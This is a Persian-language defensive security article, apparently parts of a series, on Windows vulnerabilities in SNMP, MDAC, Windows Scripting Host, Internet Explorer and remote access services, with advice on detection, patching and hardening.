در اين رابطه می توان با بررسی اجراء سرويس در Services applet ،  در ليست پردازه ها نسبت به اين موضوع آگاه و يا با دستور  " net stat " در خط دستور و يا با مشاهده و جستجوی سرويس های اجرائی بر روی پورت های 161 و 162 با استفاده از دستور "netstat -an" اين عمليات را انجام داد . در صورت تحقق يکی از شرايط زير و نصب  SNMP ،  سيستم در معرض آسيب  و تهديد قرار خواهد داشت :

• وجود اسامی SNMP Community پيش فرض و يا خالی ( اسامی استفاده شده بعنوان رمزهای عبور )
• وجود اسامی SNMP Community  قابل حدس
• وجود رشته های مخفی SNMP Community

نحوه حفاظت در مقابل نقطه آسيب پذير 
بمنظور حفاظت در مقابل نقطه آسيب پذير فوق ،در دو زمينه می توان اقدامات حفاظتی را سازماندهی نمود .

حفاظت در مقابل  درخواست های آسيب رسان  و تهديد کننده :

• غير فعال نمودن SNMP در صورت عدم ضرورت استفاده از آن
• استفاده از يک مدل امنيتی مبتنی بر کاربر SNMPv3 ،  بمنظور تائيد پيام ها و رمزنگاری داده ها ( در صورت امکان )
• در صورت استفاده از SNMP نسخه يک و يا دو ، می بايست آخرين نسخه Patch ارائه شده توسط توليد کننده ، نصب گردد برای آگاهی از مشخصات توليدکننگان، می توان به  بخش ضميمه CERT Advisory CA-2002-03 ، مراجعه نمود .
• SNMP را در گلوگاه های ورودی شبکه فيلتر نمائيد ( پورت 161 مربوط به TCP/UDP و پورت 162 مربوطه به TCP/UDP )  . عمليات فوق را در موارديکه ضرورتی به مديريت دستگاهها بصورت خارجی وجود ندارد ، می بايست انجام داد .
• از  کنترل دستيابی مبتنی بر ميزبان بر روی سيستم های SNMP agent استفاده گردد . ويژگی فوق ممکن است توسط SNMP agent سيستم های عامل دارای محدوديت هائی باشد ، ولی می توان کنترل لازم در خصوص پذيرش درخواست ها توسط agent مربوطه را انجام داد. در اکثر نسخه های ويندوز 2000 و به بعد از آن ، می توان عمليات فوق را توسط  يک فيلتر IPSEC  انجام داد . استفاده از يک فايروال فيلترينگ بسته های اطلاعاتی مبتنی بر agent  بر روی يک ميزبان  نيز می تواند در بلاک نمودن درخواست های ناخواسته SNMP موثر واقع شود .

حفاظت در مقابل رشته های قابل حدس

• غير فعال نمودن SNMP در صورت عدم ضرورت استفاده از آن
• استفاده از يک مدل امنيتی مبتنی بر کاربر SNMPv3 ،  بمنظور تائيد پيام ها و رمزنگاری داده ها ( در صورت امکان )
• در صورت استفاده از SNMP نسخه يک و يا دو ، می بايست از يک سياست خاص بمنظور اسامی community ( استفاده شده بعنوان رمزهای عبور ) استفاده گردد. در اين راستا لازم است اسامی بگونه ای انتخاب گردند که  غير قابل حدس بوده و بصورت ادواری و در محدوده های خاص زمانی نيز تغيير داده شوند .
• با استفاده از امکانات موجود می بايست بررسی لازم در خصوص  استحکام اسامی در نظر گرفته شده برای رمزهای عبور راانجام داد.در اين رابطه می توان از خودآموز و ابزار ارائه شده در آدرس  http://www.sans.org/resources/idfaq/snmp.php ، استفاده کرد.
• SNMP را در گلوگاه های ورودی شبکه فيلتر نمائيد ( پورت 161 مربوط به TCP/UDP و پورت 162 مربوطه به TCP/UDP )  . عمليات فوق را در موارديکه ضرورتی به مديريت دستگاهها بصورت خارجی وجود ندارد ، می بايست انجام داد . پيکربندی فيلترينگ را صرفا" بمنظور ترافيک مجاز SNMP بين subnet های مميزی شده ، انجام دهيد.

• بخش اول : بررسی IIS  و MSSQL
• بخش دوم : بررسی  Windows Authentication
• بخش سوم :بررسی IE و Remote Access Services

در بخش چهارم  اين مقاله به بررسی نقاط آسيب پذير  MDAC  و  WSH ، خواهيم پرداخت .

ششمين  نقطه آسيب پذير : ( Microsoft Data Access Components (MDAC
MDAC ، شامل مجموعه ای از تکنولوژی های مرتبط با بانک اطلاعاتی است که در تعدادی از نسخه های اخير ويندوز، بکارگرفته شده است . مهاجمان با استفاده از نقاط آسيب پذير MDAC ، تاکنون حملات متعددی را  در اين رابطه سازماندهی و توانسته اند از سيستم های آسيب پذير در جهت اهداف خود ( اجراء کد و دستورات مخرب )  استفاده نمايند . حملات فوق ، می تواند دلايل متعددی داشته باشد ولی می توان به دو عامل اصلی در اين زمينه اشاره نمود : استفاده از رويکردهای قديمی ( نظير RDS  )  و وجود مسائل جديد در محصولات ارائه شده که يک مهاجم را قادر می سازد با ايجاد يک buffer overflow ، تمامی سيستم را بمخاطره اندازد .
RDS که از کلمات Remote Data Services اقتباس شده است ، نسخه قديمی MDAC بوده و دارای يک ضعف امنيتی است که کاربران از راه دور را قادر می سازد ، دستوراتی را بصورت محلی بهمراه مجوزها و امتيازات مديريتی، اجراء نمايند.با ترکيب ضعف فوق بهمراه ضعف امنيتی موجود در Microsoft Jet Database Engine 3.5 ( بخشی از MS Access  ) ، آسيب پذيری سيستم افزايش و زمينه تهديدات متعددی فراهم می گردد( دستيابی به بانک های اطلاعاتی ) .ضعف ها و مشکلات فوق ، بطور کامل شناخته شده و بيش از سه سال است که مستندات لازم بمنظور مقابله با آنان تهيه و ارائه شده است . وجود سيستم های قديمی که هنوز خود را با آخرين وضعيت موجود بهنگام نکرده و يا عدم پيکربندی مناسب سيستم ها ، از دلايل اصلی آسيب پذيری سيستم ها ی موجود می باشد  .   
مهاجمان تاکنون با استفاده از ضعف فوق ،حملات متنوعی را سازماندهی و به سرانجام رسانده اند . يکی ازحملات اخير در اين رابطه ،  بدليل Buffer Overflow در MDAC بوده که در بولتن ( خبرنامه )  امنيتی شماره MS03-033 مايکروسافت به آن  اشاره شده است . نسخه MDAC  در ويندوز 2003 ، دارای اين نقطه آسيب پذير نمی باشد .

سيستم های عامل در معرض تهديد
اکثر سيستم های ويندوز NT 4.0 که بر روی آنان نسخه های  سه  و يا چهار برنامه IIS ، ويژوال استوديو شش  و يا  RDS 1.5  ، نصب شده باشد ، دارای  ضعف امنيتی فوق می باشند. ويندوز 2000 و XP همانند سيستم هائی که بر روی آنان آفيس 2000 ( بهمراه SP1 ) ، نسخه SQL Server 7  ( که بر روی آنان SP2 و به بعد نصب شده است ) ، SQL Server 2000  از MDAC  استفاده می نمايند . همانگونه که مشاهده می شود، اکثر نسخه های ويندوز دارای نقطه آسيب پذير فوق می باشند .

نحوه تشخيص آسيب پذير ی سيستم
درصورتيکه بر روی کامپيوتری  ويندوز NT 4.0  بهمراه  IIS نسخه سه ويا چهار نصب شده باشد ، می بايست بررسی لازم  در خصوص وجود فايل "msadcs.dll" انجام شود( فايل فوق،عموما" در آدرس    C:\Program Files\Common Files\System\Msadc\msadcs.dll ، قرار دارد، آدرس فوق ممکن است با توجه به پيکربندی سيستم متفاوت باشد). در صورتيکه  سيستم مورد نظر شامل فايل فوق باشد ، بهنگام سازی و يا Patching سيستم ، منطقی ترين کاری است که می توان انجام داد.در صورت وجود نرم افزارهای قديمی و سيستم های عامل اشا ره شده، سيستم در معرض تهديد و آسيب قرار خواهد داشت. بمنظور آگاهی از جزيئات لازم در خصوص نقاط آسيب پذير اخير MDAC  می توان از بولتن امنيتی شماره MS03-033مايکروسافت استفاده نمود . در ايـن رابطه می توان از  Windows Update نيز بمنظور تشخيص آسيب پذيری سيستم ، استفاده نمود. امکان فوق ، بررسی لازم در خصوص نرم افزارهای نصب شده بر روی ماشين را انجام و متناسب با شرايط موجود اقدام به بهنگام سازی نرم افزارها خواهد نمود.

نحوه حفاظت در مقابل نقطه آسيب پذير
در رابطه با ضعف های RDS ، Jet  و نحوه تصحيح و مقابله با آنان می توان از آدرس http://www.wiretrip.net/rfp/txt/rfp9907.txt استفاده نمود. مايکروسافت نيز در اين رابطه چندين بولتن ( خبرنامه ) امنيتی را منشتر که در آنان نحوه برخورد وحفاظت در مقابل اين نقطه آسيب پذير نشريح شده است .

http://support.microsoft.com/support/kb/articles/q184/3/75.asp
http://www.microsoft.com/technet/security/bulletin/ms98-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-033.asp
http://support.microsoft.com/default.aspx?scid=kb;en-us;823718

بمنظور برخورد با ضعف امنيتی فوق ، می توان MDAC موجود را به نسخه MDAC ver 2.8 ، ارتقاء داد . آخرين نسخه MDAC و ساير عناصر مرتبط با بانک های اطلاعاتی را میتوان از طريق آدرس http://msdn.microsoft.com/library/default.asp?url=/downloads/list/dataaccess.asp مشاهده و دريافت نمود. در ايـن رابطه می توان  از  Windows Update نيز استفاده نمود.

هفتمين  نقطه آسيب پذير :  (Windows Scripting Host (WSH
WSH ، تکنولوژی ارائه شده توسط مايکروسافت بمنظور افزايش عملکرد  وتوانائی های ويندوز می باشد .تکنولوژی فوق ، از جاوا اسکريپت و VBScript حمايت و اولين مرتبه بهمراه IEنسخه پنج ارائه ودرادامه بعنوان يک استاندارد بهمراه ساير نسخه های سيستم عامل ويندوز ارائه گرديد( آغاز آن با ويندوز 98 همراه بوده است ) . تکنولوژی WSH ،  امکان دستيابی به پوسته ويندوز ، سيستم فايل ، ريجستری و ساير موارد ديگر را با استفاده از کدهای ساده اسکريپت فراهم می نمايد( پتانسيل های فوق در جهت اتوماسيون عمليات ويندوز ارائه شده است ) . اسکريپت ها می توانند مستقيما" از طريق Desktop و با کليک نمودن بر روی يک فايل اسکريپت و يا از طريق يک برنامه اجراء گردند ( نظير يک برنامه سرويس گيرنده پست الکترونيکی ) .
ويژگی اجراء اتوماتيکWSH ، عامل اصلی عرضه و انتشار کرم  ILOVEYOU ( کد نوشته شده توسط VBScript ) در ساليان گذشته بوده که  باعث ميليونها دلار خسارت گرديد.کرم فوق و ساير کرم هائی که پس از آن مطرح گرديدند ، بمنظور نيل به اهداف مخرب خود  از مزايای WSH  استفاده  نموده اند . بدين ترتيب ، امکان اجرای هر نوع  فايل متنی با  انشعاب  vbs,.vbe, .js, .jse . وwsf . ،بعنوان يک اسکريپت ويژوال بيسيک و يا Jscript  با مجوزهای سطح سيستم و يا برنامه  ، فراهم می گردد .

سيستم های عامل در معرض تهديد
WSH ، می تواند بصورت دستی و يا از طريق   IE( نسخه پنج به بعد ) ، بر روی ويندوز NT و 95 نصب گردد .درويندوز ME , 98 , 98SE , 2000 , XP و 2003  ، WSH  بصورت پيش فرض نصب می گردد . برای دريافت آخرين نسخه Windows Scrpt  می توان از آدرس Download Windows Script استفاده نمود .

نحوه تشخيص آسيب پذير ی سيستم

• سيستم هائی  که بر روی آنان ويندوز 95 و يا NT بهمراه نسخه IE 5.5 نصب شده است .
• سيستم هائی که بر روی آنان ويندوز 98 ، ME ، 2000,XP و يا 2003 نصب شده است.

در صورتيکه WSH بر روی سيستم نصب و رفتار آن کنترل شده نباشد ، سيستم در معرض آسيب قرار خواهد داشت . در اين رابطه لازم است که بررسی لازم در خصوص سيستم هائی که WSH بر روی آنان نصب شده است را انجام و در ادامه با استفاده از روش هائی که دربخش بعد به آنان اشاره خواهد شد ، از يک راهکار منطقی بمنظور حفاظت در مقابل آن  ، استفاده گردد..

نحوه حفاظت در مقابل نقطه آسيب پذير
در ابتدا لازم است به اين نکته مهم اشاره گردد که  برخی برنامه ها وعمليات مديريتی، نيازمند استفاده از WSH بوده و در صورت غير فعال نمودن و يا حذف پتانسيل فوق ، برنامه های فوق با اشکال مواجه خواهند شد .
غيرفعال نمودن WSH
تکنولوژی WSH ، بخشی اختياری از سيستم عامل ويندوز بوده و می توان با اطمينان و بدون نگرانی خاصی  آن را  در موارد متعددی از روی  کامپيوترها ، حذف و يا غير فعال نمود.پيشنهاد می گردد ،  بمنظور حفاظت در مقابل حملات و مسائل امنيتی مرتبط با  WSH ، پتانسيل فوق غير فعال گردد (در موارديکه به عملکرد آن بر روی سيستم نياز نمی باشد ) .                                                    
برنامه Noscript.exe ، ارائه شده توسط Symantec ، سرويس WSH را با تغيير نام فايل کلاس های مربوط به هر کلاسی که دارای Wscript.exe و يا Cscript.exe در کليد های  ريجستری Shell\Open2\Command و يا Shell\Open\Command است ، غير فعال می نمايد.بدين ترتيب ، پيشگيری لازم در خصوص اجرای تمامی اسکريپت ها صرفنظر از اهداف مثبت و يا منفی آنان  ، انجام خواهد شد . بمنظور نصب  برنامه Noscript.exe  مراحل زير را دنبال می نمائيم :

• دريافت برنامه  Noscript.exe  از سايت Symantec
• پس از  اجراء برنامه Noscript ( برنامه Norton Script Disabler/Enabler ، نمايش داده می شود) با توجه به آخرين وضعيت WSH ( فعال و يا غير فعال ) ، امکان فعال و يا غير فعال نمودن آن فراهم می گردد.

تغيير در رفتار پيش فرض WSH
بمنظور حفاظت و پيشگيری لازم در خصوص عملکرد WSH  در جهت انجام  پردازش های اتوماتيک Desktop و مديريتی با لحاظ نمودن تهديدات و مسائل ايمنی ، می توان  رفتار پيش فرض ويندوز را در ارتباط با فايل های اسکريپت ( فايل هائی با انشعاب vbs, .vbe, .js, jse, .wsf . ) ، تغيير داد. . نحوه برخورد پيش فرض ويندوز با فايل ها ی اسکريپت ، مشابه فايل های استاندارد اجرائی ويندوز بوده  ( فايل های با انشعاب EXE. و يا COM. )  و بلافاصله آنان اجراء خواهند شد . با تغيير تنظيمات و پيکربندی انجام شده می توان امکان اجرای اتوماتيک اسکريپت های WSH را حذف تا اطمينان لازم در خصوص عدم فعال شدن اسکريپت های غير مجاز ، فراهم نمود .در چنين مواردی پس از فعال شدن فايل حاوی اسکريپت ، فايل مورد نظر در مقابل اجرای اتوماتيک در يک اديتور متنی نمايش داده خواهد شد . بدين ترتيب ، کاربران می توانند پس از اطمينان از صحت اسکريپت های نوشته شده ، تصميم لازم در خصوص اجرای آنان را اتخاذ نمايند . بنابراين ، عرصه برای اسکريپت هائی که سعی در تهديد و آسيب سيستم را دارند ، محدود و در عين حال کنترل شده می گردد. اسکريپت های مجاز WSH ، همچنان امکان اجراء را خواهند داشت . بدين منظور می توان نام فايل حاوی اسکريپت را بعنوان آرگومان برنامه های cscript.exe و يا wscript.exe  تعريف و مشخص نمود .

cscript.exe myscript.vbs
wscript.exe myscript.vbs

بمنظور کسب اطلاعات بيشتر در رابطه با نحوه حذف  و يا غير فعال نمودنWSH می توان از آدرس   http://www.symantec.com/avcenter/venc/data/win.script.hosting.html استفاده  نمود .

آنتی ويروس ها
پيشنهادمی گردد که برنامه آنتی ويروس بهنگام شده ای  در gatways ، سرويس دهندگان و ميزبانان ، نصب گردد.(علاوه بر غير فعال نمودنWSH ) . بدين ترتيب،  می توان  با استفاده از پتانسيل های ارائه شده توسط نرم افزارهای فوق ، برخورد لازم در ارتباط با  نامه های الکترونيکی که دارای ضمائم حاوی اسکريپت های مخرب  بمنظور انتشار ويروس ها و کرم ها  می باشند را انجام داد( نظير فايل های vbs, .vbe, .js, .jse, .wsf, .bat, .exe, .pif and .scr .) .مثلا" برنامه Norton AntiVirus 2001 به بعد،  امکان Script Blocking را ارائه که می تواند ميزبانان را در مقابل ويروسهای مبتنی بر WSHحفاظت نمايد .

بهنگام سازی موتور ( هسته ) اسکريپت
WSH طی ساليان اخير ، بدفعات ارتقاء يافته است .آخرين نسخه آن  را می توان از آدرس  Download Windows Script دريافت نمود .

مجوزهای NTFS
از مجوزهای دستيابی NTFS می توان بمنظور تعريف سطح دستيابی قابل دسترس برای wscript.exe  و jscript.exe  در ارتباط با کاربران و يا گروه هائی ازکاربران بهمراه account های معتبر ويندوز،استفاده نمود . زمانيکه يک دايرکتوری و يا فايل به اشتراک گذاشته می شود ، تنظيمات پيش فرض دستيابی  برای دايرکتوری ها و فايل های NTFS ، بصورت  Full Control و برای گروه Everyone که شامل تمامی کاربران می باشد ، در نظر گرفته می شود. بدين ترتيب ، تمامی کاربران دارای مجوز لازم در خصوص اصلاح ، انتقال وحذف فايل ها و يا دايرکتوری ها ، می باشند.تنظيمات پيش فرض فوق برای wscript.exe و cscript.exe مناسب نمی باشند . ايمن سازی فايل ها و فولدرها شامل حذف کاربران و گروه هائی است که ضرورتی در رابطه با دستيابی به منابع را ندارند . بمنظور تغيير مجوزهای NTFS در ارتباط با يک دايرکتوری و يا فايل مراحل زير را دنبال می نمائيم :

• فعال نمودن My Computer ، انتخاب درايو ، دايرکتوری و يا فايلی که قصد ايمن سازی آن وجود داشته باشد.
• فعال نمودن صفحه Property مربوط به شی انتخاب شده ( درايو ، دايرکتوری ، فايل )
• در بخش Security صفحه خصايص ،  Account مورد نظری که قصد تغيير مجوزهای مرتبط با آن وجود دارد را انتخاب می نمائيم .
• در بخش  Permission ، نوع دستيابی را برای کاربر و يا گروه مربوطه مشخص می نمائيم  .گزينه Allow امکان  دستيابی و Deny عدم دستيابی در ارتباط با يک مجوز ( خواندن ، نوشتن و ... ) را مشخص می نمايد .

در صورتيکه در صفحه Property مربوط به فايل ، درايو و يادايرکتوری ، Security tab مشاهده نمی گردد ، سيستم فايل کامپيوتر ميزبان بصورت NTFS پيکربندی نشده است . بمنظور تبديل سيستم فايل به NTFS ، می توان از دستور Convert استفاده نمود (  convert drive_letter: /fs:ntfs ). بمنظور کسب اطلاعات بيشتر در خصوص نحوه تنظيم مجوزهای NTFS ، برای يک دايرکتوری و يا فايل می توان از آدرس http://www.microsoft.com/windows2000/en/server/iis/htm/core/iidfpsc.htm استفاده نمود .

در بخش پنجم  اين مقاله به بررسی ساير نقاط آسيب پذير ويندوز خواهيم پرداخت .

آنچه تاکنون گفته شده است :

• بخش اول : بررسی IIS و MSSQL
• بخش دوم : بررسی Windows Authentication

در بخش سوم اين مقاله به بررسی نقاط آسيب پذير (Internet Explorer (IE و Windows Remote Access Services ، خواهيم پرداخت .

چهارمين نقطه آسيب پذير: (Internet Explorer (IE
IE ، مرورگر وب پيش فرض نصب شده در پلات فرم ويندوز مايکروسافت است .در صورتيکه نسخه های نصب شده IE در ادامه Patch و بهنگام نگردند ، تمامی آنان دارای نقاط آسيب پذير خواهند بود . تاکنون حملات متعددی بر اساس نقاط آسيب پذير در مرورگرهای IE توسط مهاجمان انجام شده است . نقاط آسيب پذير در IE را می توان به گروههای متفاوتی نظير : صفحات وب ، بروز اشکال در اينترفيس ويندوز ، کنترل های اکتيو ايکس ، اسکريپت های فعال ، تفسير نادرست محتوی و نوع MIME و سرريز بافر تقسيم بندی نمود. مهاجمان با استناد به نقاط آسيب پذير فوق می تواند حملاتی راانجام دهند که پيامد آن افشاء کوکی ها ، دستيابی به فايل های محلی و داده ، اجراء برنامه های محلی ، دريافت و اجرای کد های دلخواه و يا کنترل کامل سيستم آسيب پذير است .

سيستم های عامل در معرض تهديد
نقاط آسيب پذير اشاره شده بر روی تمامی سيستم هائی که از نسخه های متفاوت ويندوز استفاده می نمايند ، وجود خواهد داشت . مرورگر IE در موارد متعدد و گسترده ای در نرم افزارهای مايکروسافت نصب و عموما" بر روی اغلب سيستم های ويندوز وجود خواهد داشت . مرورگر IE ، حتی بر روی سرويس دهندگانی که شايد ضرورت استفاده از مرورگر برای آنان چندان وجود ندارد نيز نصب می گردد .

نحوه تشخيص آسيب پذير ی سيستم
در صورتيکه بر روی سيستمی مرورگر IE وجود داشته وهنوز آخرين و جديدترين Patch های امنيتی نصب نشده باشند ، سيستم در معرض تهديد و آسيب قرار خواهد داشت . در صورتيک سرويس Windows Update بر روی سيستم فعال باشد با مشاهده سايت http://windowsupdate.microsoft.com ، می توان بررسی لازم در خصوص IE و Patch های نصب شده و مورد نياز را انجام داد. در صورتيکه سرويس Windows Update فعال نشده باشد ، می توان از برنامه HFNetChk و يا Microsoft BaseLine Security Analyzer استفاده نمود. در اين راستا می توان از برنامه های Online موجود در اينترنت ( ابزارهای آناليز مرورگر وب ) نظير : Qualys Browser Check که دارای توانائی بسيار بالا و مطلوبی می باشند در جهت بهبود وضعيت امنيتی IE ، استفاده نمود.

نحوه حفاظت در مقابل نقطه آسيب پذير
Patch های لازم برای نقاط آسيب پذير اشاره شده بمنظور استفاده در مرورگر IE نسخه شش موجود و قابل استفاده است . نسخه های اوليه IE نيز آسيب پذير بوده و متاسفانه Patch های لازم در اينخصوص اغلب موجود نمی باشند. در صورتيکه بر روی سيستمی از نسخه IE 5.5 استفاده می گردد، پيشنهاد می گردد نسخه فوق به شش ، ارتقاء يابد . علت اين امر ، عدم وجود patch های لازم در اينخصوص است . در صورتيکه از نسخه IE 6.0 استفاده می گردد ، آن را با آخرين Service Pack ارائه شده ، ارتقاء و بهنگام نمائيد . برای دريافت Service Pack های می توان از آدرس : Internet Explore 6 SP1 استفاده نمود . در اين رابطه لازم است که آخرين Patch جامع امنيتی ( 822925 ) که باعث اصلاح نقاط آسيب پذير اضافه ديگری می گردد را نيز بر روی سيستم نصب نمود.
ايمن سازی IE
برنامه IE دارای مجموعه ای از امکانات امنيتی بوده که با تنظيم و پيکربندی صحيح آنان می توان وضعيت امنيتی IE رابهبود بخشيد . برای نيل به خواسته فوق ، می توان مراحل زير را دنبال نمود:

• انتخاب گزيته Options از طريق منوی Tools
• انتخاب گزينه Security Tab و فعال نمودن Custom Level مرتبط با Inetnet Zone .
  اکثر حملات مبتنی بر نقاط آسيب پذير IE ، بدليل سوء استفاده از پتانسيل های Active Scripting و ActiveX Controls ، محقق می گردند. بنابراين لازم است ، فعال شدن و بهره برداری از پتانسيل های فوق با نظارت و آگاهی کاربر انجام شود :
• دربخش Scripting ، گزينه Prompt for Allow paste operations via script را انتخاب تا يشگيری لازم درخصوص محتوی موردنظر از طريق Clipboard انجام شود. ( لازم است به اين نکته اشاره گردد که Active Scripting نمی بايست غير فعال گردد ،چراکه تعداد زيادی از وب سايت ها از پتانسيل فوق ، استفاده می نمايند ) .
• انتخاب گزينه Prompt برای Download signed ActiveX Controls
• انتخاب گزينه Disable برای Download unsigned ActiveX Controls
• انتخاب گزينه Disable برای Initialize and script ActiveX Controls not marked as safe
  اپلت های جاوا دارای قابليت های بمراتب بيشتری نسبت به اسکريپت ها می باشند:
• در بخش Microsoft VM ، گزينه High safety for Java permissions را در ارتباط با مجوزهای لازم بمنظور اجرای صحيح اپلت های جاوا و پيشگيری دستيابی به سيستم ، انتخاب گردد.
• در بخش Miscellaneous ، گزينه Access to data sources across domains ، بمنظور ممانعت از حملات مبتنی بر Cross-site scripting ، غير فعال گردد.

پنجمين نقطه آسيب پذير : Windows Remote Access Services

نسخه های متفاوت ويندوز ، امکانات و تکنولوژی های متفاوتی را در ارتباط با شبکه ارائه و حمايت می نمايند .در اين رابطه برخی از امکانات و پتانسيل های ارائه شده در ارتباط با اکثر پروتکل های شبکه ای استاندارد و توانائی های ارائه شده مربوط به تکنولوژی های شبکه ای مختص ويندوز ، مورد حمايت ذاتی ويندوز قرار می گيرند. پيکربندی غير ايمن و نادرست مواردی همچون اشتراک های شبکه NETBIOS ، جلسات Anonymous Logon NULL ، دستيابی راه دور به ريجستری و فراخوانی از راه دور روتين ها ( RPC ) ، زمينه تهاجمات متعددی را در ارتباط با ويندوز و با استناد به امکانات و قابليت های شبکه ای آن ، فراهم نموده است . در ادامه به تشريح هر يک از موارد فوق ، خواهيم پرداخت :
NETBIOS : عدم حفاظت مناسب از منابع اشتراکی
سيتم عامل ويندوز ، امکان اشتراک فايل و يا فولدرهائی را برای يک ماشين فراهم و بدين ترتيب ساير ميزبانان موجود در شبکه قادر به استفاده از منابع به اشتراک گذاشته شده توسط ساير ميزبانان بوده و خود نيز می توانند ، منابع موجود بر روی سيستم را با سايرين به اشتراک گذاشته تا زمينه استفاده از منابع فوق برای ساير ميزبانان شبکه نيز فراهم گردد . مکانيزم فوق مبتنی بر پروتکل Server Message Block)SMB) و يا Common Internet File System)CIFS) می باشد. پروتکل های فوق ، امکان انجام عمليات بر روی فايل ها را از راه دور برای يک ميزبان فراهم می نمايند. ( دقيقا" مشابه وضعيتی که عمليات بر روی يک کامپيوتر محلی انجام می گيرد ) .پتانسيل فوق يکی از امکانات برجسته و قدرتمند ويندوز بوده ولی بدليل عدم پيکربندی صحيح اشتراک شبکه، می تواند سوءاستفاده از فايل های حياتی سيستم و کنترل يک ميزبان توسط يک مهاجم را بدنبال داشته باشد. برخی از کرم ها و ويروس ها ( نظير نيمدا که در سال 2001 حيات خود را آغاز و در مدت زمانی کوتاه توانست بسرعت درشبکه منتشر شود ) با استناد و بهره برداری از نقاط ضعف فوق و عدم حفاظت مناسب اشتراک شبکه ، توانستند نسخه هائی از خود را بر روی ميزبانان ، مستقر نمايند. بسياری از استفاده کنندگان کامپيوتر بدليل عدم پيکربندی مناسب اشتراک منابع در شبکه ، پتانسيل لازم در خصوص يک تهاجمم و بهره برداری از آن توسط مهاجمان را بصورت ناآگاهانه ايجاد می نمايند. کاربران فوق با اهداف مثبت و تسهيل در ارائه امکان دستيابی ساير همکاران خود ، برخی از منابع موجود بر روی سيتسم ( نظير درايو ها و يا برخی فولدرها و يا فايل ها ) را به اشتراک گذاشته تاامکان خواندن و نوشتن برای ساير کاربران شبکه فراهم گردد.در صورتيکه پيکربندی مناسبی از منابع به اشتراک گذاشته شده در شبکه انجام شود، ريسک و خطر سوء استفاده و يا تهديدات بطرز محسوسی کاهش خواهد يافت .
Anonymouse Logon
Null Session ، عملا" به يک Session ايجاد شده بدون اعتبارنامه ( نام و رمز عبور خالی ) ، اطلاق می گردد. از يک Null Session بمنظور نمايش اطلاعات مرتبط با کاربران ، گروه ها ، منابع اشتراکی و سياست های امنيتی استفاده می گردد . سرويس های ويندوز NT ،بعنوان Local System account بر روی کامپيوتر محلی اجراء و با ساير سرويس ها ی شبکه از طريق ايجاد يک null Session ارتباط برقرار می نمايند. ويندوز 2000 و سرويس های مرتبط ، که بعنوان Local System account بر روی Local Computer اجراء می گردند ، از Local computer account بمنظور تائيد ساير سرويس دهندگان، استفاده می نمايند. اکتيو دايرکتوری در موارديکه بصورت native اجراء می گردد ، قادربه پذيرش درخواست های Null Session نخواهد بود. در حالت ترکيبی ، اکتيو دايرکتوری ، امکان دستيابی را برای نسخه های قبل از ويندوز 2000 فراهم و قادر به پذيرش درخواست های Null Session خواهد بود . بدين ترتيب با اينکه ويندوز 2000 ونسخه های بعد از آن امکان درخواست های مبتنی برNull Session را فراهم نمی نمايند ولی بدليل سازگاری و پاسخگوئی به نسخه های قبل از ويندوز 2000 ، امکان تغيير در سياست فوق در رابطه با اکتيو دايرکتوری فراهم و اين مشکل امنيتی ( Null Session ) می تواند به ويندوز 2000 نيز سرايت نمايد .

دستيابی از راه دور به ريجستری ويندوز
ويندوز 98 ، CE ، NT ، 2000 ، ME و XP از يک بانک اطلاعاتی مرکزی سلسله مراتبی ، که ريجستری ناميده می شود بمنظور مديريت نرم افزار ، پيکربندی دستگاهها و تنظيمات کاربر استفاده می نمايند. مجوزهای نادرست و يا تنظيمات اشتباه امنيتی می تواند زمينه دستيابی از راه دور به ريجستری را توسط مهاجمان فراهم و آنان در ادامه قادر به سوء استفاده از وضعيت فوق و بمخاطره انداختن سيستم و اجرای کدهای مخرب خواهند بود.

فراخوانی از راه دور (Remote Procedure Calls: RPC )
تعداد زيادی از نسخه های ويندوز ( NT ، 2000 ، XP ، 2003 ) از يک مکانيزم ارتباطی Inter-Process استفاده می نمايند. درچنين مواردی يک برنامه در حال اجراء بر روی يک کامپيوتر ميزبان ، قادر به فراخوانی کد موجود در ميزبان ديگر و از راه دور می باشد .تاکنون حملات متعددی با استفاده از نقطه آسيب پذير فوق ، صورت گرفته است . در چنين مواردی يک مهاجم قادر به اجرای کد دلخواه خود بر روی يک ميزبان از راه دور می گردد. (بهمراه مجوزهای مشابه سيستم محلی ) . کرم های Blaster/MSblast/LovSAN و Nachi/Welchia از نقطه آسيب پذير فوق استفاده کرده اند. در برخی موارد با استفاده از ساير نقاط آسيب پذير يک مهاجم قادر به انجام حملات از نوع DoS ، در ارتباط با عناصر RPC است .
سيستم های عامل در معرض آسيب
تمامی نسخه های ويندوز در معرض اين تهديد قرار دارند .

نحوه تشخيص آسيب پذيری سيستم
نحوه تشخيیص آسيب پذيری سيستم در رابطه با مسائل NETBIOS : در اين رابطه می توان از تعداد زيادی ابزار بمنظور تشخيص اشکالات امنيتی مرتبط با NETBIOS استفاده نمود.NAT که از کلمات NetBIOS Auditing Tool اقتباس شده است ،يک محصول نرم افزار در اينخصوص و ارائه شده توسط Afentis Security می باشد . NAT ، بررسی لازم در خصوص سرويس اشتراک فايل مربوط به NETBIOS را بر روی سيستم های مقصد ،انجام و از يک رويکرد مرحله ای بمنظور جمع آوری اطلاعات قبل از تلاش در جهت امکان دستيابی به سيستم فايل، استفاده می نمايد . برای آگاهی از نحوه عملکرد برنامه فوق ، می توان از آدرس http://www.afentis.com/resources/win32/nat استفاده نمود.
کاربران ويندوز 95 و 98 ، می توانند از Legion v2.11 ( آخرين نسخه پويشگر اشتراک فايل Legion ارائه شده توسط Rhino9 ) بمنظور بررسی وضعيت اشتراک شبکه استفاده نمايند. کابران ويندوز 2000 ، می توانند از برنامه Security Fridays Share Password Checker ) SPC) بمنظور بررسی اشتراک فايل سرويس گيرندگان ويندوز (نسخه های 95 ، 98 و CE )استفاده نمايند. برنامه فوق ، امکان تشخيص آسيب پذيری سيستم در ارتباط با Share Level password را فراهم می نمايد. کاربران ويندوز NT ( که بر روی آنان SP4 نصب شده باشد ) ، 2000 ، XP و 2003 ، می توانند از برنامه BaseLine Security Advisor استفاده و با اخذ گزارش لازم در خصوص ميزبانان آسيب پذير در رابطه با SMB ، اقدام به برطرف نمودن مشکل فوق نمايند.
بررسی و تست سيستم های آسيب پذير را می توان بر روی ميزبانان محلی و يا ميزبانان از راه دور انجام داد . کاربران ويندوز NT ، 2000 ، XP و 2003 می توانند با استفاده از دستور net Share و از طريق خط دستور، ليست منابع اشتراکی را مشاهده نمايند (برای آگاهی از اطلاعات تکميلی در ارتباط با دستور فوق ، می توان از ? / Net Share ، استفاده نمود ) .
